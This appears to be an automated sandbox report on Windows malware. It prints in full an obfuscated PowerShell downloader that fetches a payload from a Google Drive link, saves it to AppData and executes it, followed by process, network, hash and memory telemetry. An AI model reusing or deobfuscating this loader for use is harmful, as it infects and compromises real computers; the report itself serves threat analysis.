Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4364 -ip 4364

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 1896

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 104.116.69.13.in-addr.arpa udp

Files

memory/2516-0-0x00007FFEEAAA3000-0x00007FFEEAAA5000-memory.dmp

memory/2516-1-0x000001F898C90000-0x000001F898CB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbancuv1.ibb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2516-11-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp

memory/2516-12-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp

memory/2516-15-0x00007FFEEAAA3000-0x00007FFEEAAA5000-memory.dmp

memory/2516-16-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp

memory/2516-17-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp

memory/2516-20-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp

memory/4948-21-0x00000000022B0000-0x00000000022E6000-memory.dmp

memory/4948-22-0x0000000004EC0000-0x00000000054E8000-memory.dmp

memory/4948-23-0x0000000004D10000-0x0000000004D32000-memory.dmp

memory/4948-25-0x00000000054F0000-0x0000000005556000-memory.dmp

memory/4948-24-0x0000000004DB0000-0x0000000004E16000-memory.dmp

memory/4948-35-0x00000000055A0000-0x00000000058F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 806286a9ea8981d782ba5872780e6a4c
SHA1 99fe6f0c1098145a7b60fda68af7e10880f145da
SHA256 cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713
SHA512 362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

memory/4948-37-0x0000000005BE0000-0x0000000005BFE000-memory.dmp

memory/4948-38-0x0000000005C30000-0x0000000005C7C000-memory.dmp

memory/4948-40-0x0000000006D40000-0x0000000006D5A000-memory.dmp

memory/4948-39-0x0000000007380000-0x00000000079FA000-memory.dmp

memory/4948-42-0x0000000006DF0000-0x0000000006E12000-memory.dmp

memory/4948-41-0x0000000006E50000-0x0000000006EE6000-memory.dmp

C:\Users\Admin\AppData\Roaming\Platyhelminthic195.End

MD5 6771cd798c1df9b5eddc60071dfc6e15
SHA1 65e923600e1c2604d90a481d257dc99c23fbf1dd
SHA256 0849655061e0ce5f5f2633e43ef08a62a3482cf9f15baf24fbd6b25f8abad95f
SHA512 cf0013a56ef6ab5fb48ddd80d3e94b879b6890586a5e11313c66b35c352111d3fff2d21a9f9e42a4163cf4e05419610a696e5d428a32eacb45d6f4103b9085ee

memory/4948-43-0x0000000007FB0000-0x0000000008554000-memory.dmp

memory/4948-45-0x0000000008560000-0x000000000D4E8000-memory.dmp

memory/4364-58-0x0000000001000000-0x0000000002254000-memory.dmp

memory/4364-59-0x0000000001000000-0x0000000002254000-memory.dmp